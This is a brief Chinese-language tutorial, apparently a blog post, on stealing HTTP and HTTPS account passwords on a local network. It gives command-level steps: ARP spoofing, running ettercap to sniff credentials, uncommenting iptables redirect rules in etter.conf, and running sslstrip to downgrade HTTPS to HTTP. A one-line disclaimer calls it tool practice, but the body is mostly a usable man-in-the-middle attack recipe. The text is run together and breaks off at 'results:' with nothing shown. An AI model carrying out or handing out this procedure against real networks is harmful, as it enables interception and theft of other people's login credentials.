HTTP与HTTPS账号及密码截取声明:内网中截取,解密,都不是那么容易,此类实验只为巩固工具的使用。一:1,实行ARP欺骗之后,使用工具e
ttercap命令:ettercap–Tq–ieth0(启动工具劫持账号密码,进行抓包)(—Tq启动文本模式而非图形话
界面,q安静模式)欺骗之后劫持成功。截取成功HTTP账号在此不掩饰,1,http网站少,2是会出现证书错误。二HTTPS账号及密
码截取ARP欺骗后,再在通过ettercap抓包之后,启动工具sslstrip工具。启动工具前需修改:命令vim/etc/ette
rcap/etter.conf输入i进入插入模式,上下选择。在文档中以下位置,删除蓝色#后保存退出。退出按esc后,按:(冒
号)wq回车#---------------#Linux#---------------#ifyouuseipc
hains:#redir_command_on="ipchains-Ainput-i%iface-ptcp-s
0/0-d0/0%port-jREDIRECT%rport"#redir_command_off="ipcha
ins-Dinput-i%iface-ptcp-s0/0-d0/0%port-jREDIRECT%rp
ort"#ifyouuseiptables:#redir_command_on="iptables-tnat
-APREROUTING-i%iface-ptcp--dport%port-jREDIRECT--to-por
t%rport"#redir_command_off="iptables-tnat-DPREROUTING-i
%iface-ptcp--dport%port-jREDIRECT--to-port%rport"启动工具命令:
sslstrip-a-f-k(将HTTPS协议转化为HTTP协议)—指令如下截取结果: |
|
